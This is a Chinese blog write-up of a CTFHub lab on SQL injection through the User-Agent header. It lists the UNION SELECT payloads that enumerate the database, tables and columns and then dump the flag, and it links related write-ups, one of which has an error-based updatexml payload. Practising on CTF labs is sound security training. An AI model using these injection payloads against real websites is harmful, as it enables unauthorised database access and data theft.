CTFHUB－web－SQL注入－UA

最新推荐文章于 2024-05-31 11:03:01 发布

mysmartwish

最新推荐文章于 2024-05-31 11:03:01 发布

阅读量88

点赞数

文章标签： web安全

本文链接：https://blog.csdn.net/weixin_49539962/article/details/132132747

版权

原题

解题思路

题目提示是UA注入，那就抓包并对UA头进行处理。猜测应该有两个回显。

 -1 union select 1,2

结果确有两个回显。接下来就是找数据库名、表名、列名、flag字段了。

 -1 union select 1,database()

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='rzmkwruvar'

-1 union select 1,group_concat(jshwxxbsyz) from sqli.rzmkwruvar

优惠劵

mysmartwish

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CTFHUB－web－SQL注入－UA

接下来就是找数据库名、表名、列名、flag字段了。题目提示是UA注入，那就抓包并对UA头进行处理。猜测应该有两个回显。
复制链接

扫一扫

ctfhub技能树—SQL注入—UA注入

Naptmn的博客

02-07

368

不会真的只有我不知道UA指的是user-agent吧首先先看一下什么是UA 如果大伙写过爬虫应该很熟悉加入的那个header，那个便是UA，在HTTP的请求头中可以参考这个文章 https://www.jianshu.com/p/c5cf6a1967d1 那么这个题也告诉了，注入点在UA这里，那么我们bp抓包，放入repeater，开始注入！！ 1、寻找回显位点 2、数据库名 3、表名 4、列名 5、看里面的数据得到flag ...

sql注入--10http头注入

技术骨干小李的博客

07-27

625

**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议，也是今天所有Web应用程序使用的通信协议。最初，HTTP只是一个为获取基于文本的静态资源而开发的简单协议，后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息，而后由服务器返回一条响应消息。该协议基本上不需要连接，虽然HTTP使用有状态的TCP协议作为它的传输机制，但每次请求与响应交换都会自动完成，并且可能使用不

参与评论您还未登录，请先登录后发表或查看评论

记录一次ua头注入

qq_40800734的博客

07-06

1040

打开一看随便提交点啥题目名称是sql，结合题意考虑是ua头注入抓包，添加一个单引号果然报错了尝试注入看回显猜测原语句应该是这种$query = sprintf("INSERT INTO visits (ua, user,passwd) VALUES ('%s', '%s','%s')", 尝试闭合' ,updatexml(1,concat('##',(database())),0))# 这里由于没有插入user参数，没有成功返回继续', 'xZ',updat.

CTFHUB-web-SQL注入

ookami6497的博客

11-29

712

CTFHUB SQL

CTFHub技能树 Web-SQL注入详解

千寻的博客

11-21

1868

所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下，攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。

CTFHUB-WEB-SQL注入-UA注入

weixin_43486981的博客

08-11

819

注入点在User-Agent。题目：靶机环境：直接提示输入点在User-Agent 使用burp suite抓包，注入点在User-Agent 查看显示位求数据库名求表名求列名求字段值，得到flag

CTFHub-sql注入

qq_60905276的博客

01-30

5643

1.整数型注入先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点在输入1看看。有回显。

CTFHub技能树-Web-SQL注入

qq_54037445的博客

11-28

305

CTFHub技能树-Web-SQL注入 cookie注入、UA注入、refer注入

CTFHub-Web-SQL注入

IceCream的博客

04-30

1059

1.题目说输入1，先将1输入查看结果2.接着输入4-1，发现输出的结果为4-1，判定存在整数型注入3.查询字段数，出现了回显，判断这里的字段数为24.判断注入点在2的位置，也就是data5.查询数据库名，得知为sqli6.查询该库下的表名，得知为news、flag7.查询flag表下的字段8.发现了flag字段，去查询flag字段的内容，最终得到flag。

超级SQL注入工具-web-sql

10-28

超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具，支持出现在HTTP协议任意位置的SQL注入，支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入，支持Access、MySQL5以上版本、SQLServer、Oracle...

vue+element-ui+websql

04-19

使用vue+elemetnui框架，采用websql/localsotrage作为数据存储，实现增删改查

计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf

07-08

计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf

sqIi-labs，SQL注入平台

08-06

sqIi-labs：是一款学习SQL注入的开源平台，共有75种不同类型的注入解压密码：ms08067.com sqIi-labs的使用文章见：https://blog.csdn.net/qq_41453285/article/details/100827739

Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统

05-01

Web应用程序带来了新型的计算机安全漏洞，例如SQL注入。这是一类基于输入验证的漏洞。 SQL注入的典型用法是从数据库泄漏机密信息，绕过身份验证逻辑或向数据库中添加未经授权的帐户。此安全性可防止未经授权访问您...

信息安全法规和标准

m0_62207482的博客

05-28

979

自行建设韵味的政府网站不放在境外；39、据《计算机场地安全要求（GB/T9361-2011）》，计算机机房的安全等级分为 A：计算机系统运行中断后，会对国家安全、社会秩序、公共利益造成严重损害的对计算机机房的安全有严格的要求，有完善的计算机器机房安全措施 B级：计算机系统运行中断后，会对国家安全、社会秩序、公共利益造成较大损害的计算机机房的安全有较严格的要求，有较完善的计算机机房安全措施 C级：不属于A、B级的情况，对计算机机房的安全有基本的要求，有基本的计算机机房安全措施。

【网络安全的神秘世界】在win11搭建pikachu靶场

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交